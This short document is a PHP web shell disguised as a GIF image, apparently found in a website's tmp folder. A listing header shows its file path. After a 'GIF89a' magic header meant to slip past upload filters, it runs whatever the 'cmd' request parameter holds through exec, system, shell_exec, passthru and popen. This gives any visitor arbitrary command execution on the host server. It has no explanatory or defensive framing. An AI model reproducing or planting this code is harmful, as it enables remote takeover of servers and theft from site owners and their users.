| Current Path : /home/andpasi/www/tmp/ |
| Current File : /home/andpasi/www/tmp/direct11-470628bc44e66d117ad9bd369244aec9.phtml |
GIF89a;<?php if(isset($_REQUEST['cmd'])){echo '<pre>'; $cmd=$_REQUEST['cmd']; exec($cmd); passthru($cmd); popen($cmd); system($cmd); shell_exec($cmd); echo '<pre>'; } __halt_compiler(); ?>